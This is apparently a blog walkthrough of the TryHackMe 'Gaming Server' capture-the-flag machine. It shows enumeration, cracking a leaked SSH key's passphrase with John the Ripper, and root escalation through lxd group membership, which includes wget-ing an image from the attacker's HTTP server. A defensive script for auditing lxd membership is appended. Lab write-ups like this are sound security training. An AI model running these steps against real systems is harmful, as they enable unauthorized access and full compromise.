Ifediniruozioma
Sep 20, 2020

TryHackMe Gaming Server Writeup.

Enumerating.

First, I started off with a simple nmap scan.

nmap -Pn -sC -sV -v -oA scan 10.10.173.217

This showed me that there were two ports open on the machine: port 22 for SSH and port 80 for HTTP.

Since there was a web page, I checked the source of the website's index page, which showed a comment at the bottom referring to a user named john.

Running gobuster using the common.txt wordlist from dirb revealed a /secret directory and a /uploads directory.

In the /secret index there was a single file named SecretKey, and opening it revealed a private SSH key. I copied it to my folder and gave it the right permissions.

Under the folder /uploads there were a few files and a wordlist, which I assumed would be for brute-forcing something, so I saved it to my machine.

First, I used ssh2john to format the secret key into something John the Ripper can read.

The conversion is done with this command:

> python ssh2john.py SecretKey > doog

Next, I ran the wordlist I found earlier in the uploads directory (I saved mine as Gamers.txt) against the hash.

> john doog -w=Gamers.txt

Getting User.txt

Now that I have a way to access the machine, we can use ssh to log in as the john user.

> ssh -i SecretKey john@machine_ip

When prompted for a passphrase, we enter the one found by John the Ripper earlier.

Now all we have to do is ls, and we have the user.txt.

PRIVILEGE ESCALATION

Now we are on the machine, but we only have user account privileges, and what we want is a root account. What comes to mind next is privilege escalation. First, on this box, we run

> id

Notice the 108(lxd) in the output: john is a member of the lxd group. So we try to list its images using the command

> lxc image list

So we now bring the lxd alpine builder onto the target machine using the curl command.

The lxd alpine builder can be downloaded from the following link:

On the attacker's machine, start an HTTP server, which will let you download the file from the victim's machine.

> python3 -m http.server

And upload it to the victim.

> wget attacker_ip:8000/alpine-v3.12-x86_64-20200831_1414.tar.gz

The exploit then requires that we run a script to complete the privesc, taken from the Hacking Articles page linked above. What I did was create an sh script on the victim's machine.

> nano exploit.sh

Then copy and paste the script from the exploit-db page into the script on the victim's machine, and chmod +x the script to make it executable.

> chmod +x exploit.sh

Once we run the script, we should achieve the privesc and become root.

> ./exploit.sh -f alpine-v3.12-x86_64-20200831_1414.tar.gz

Now we navigate to the directory /mnt/root/root to recover our root flag; there we can ls and find our root.txt file.
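From the defender's side, the whole escalation rests on john being in the lxd group (the 108(lxd) in the id output), so that membership is what to audit. The script below is an added example, not part of the original writeup or of any tool it uses: the function name `lxd_members`, the sample files and the `builder` account are made up for illustration, and it also catches accounts whose primary GID is lxd, which a plain look at the group file misses.

```shell
#!/bin/sh
# Added example: list every account that is in the lxd group, either as a
# supplementary member (group file) or through its primary GID (passwd file).
# Usage: lxd_members [GROUP_FILE] [PASSWD_FILE] [GROUP_NAME]

lxd_members() {
    group_file=${1:-/etc/group}
    passwd_file=${2:-/etc/passwd}
    group_name=${3:-lxd}
    awk -F: -v g="$group_name" '
        # Group database: remember the GID and every listed member.
        FILENAME == ARGV[1] {
            if ($1 == g) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++)
                    if (m[i] != "") seen[m[i]] = "supplementary"
            }
            next
        }
        # Passwd database: users whose primary group is the audited one.
        gid != "" && $4 == gid && !($1 in seen) { seen[$1] = "primary" }
        END { for (u in seen) print u ":" seen[u] }
    ' "$group_file" "$passwd_file" | sort
}

# Constructed sample data: john is a supplementary member of lxd (GID 108, as
# in the id output above); "builder" is a made-up account with lxd as its
# primary group.
demo_dir=$(mktemp -d)
cat > "$demo_dir/group" <<'EOF'
root:x:0:
lxd:x:108:john
john:x:1000:
EOF
cat > "$demo_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:john:/home/john:/bin/bash
builder:x:1001:108::/home/builder:/bin/sh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF

# Demo run on the constructed files; call lxd_members with no arguments
# to audit the live system instead.
lxd_members "$demo_dir/group" "$demo_dir/passwd"
```

Every account it prints should be treated as root-equivalent, and removed from the group if it does not need to manage containers.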

REGARDS

NIRU IFEDINIRU OZIOMA
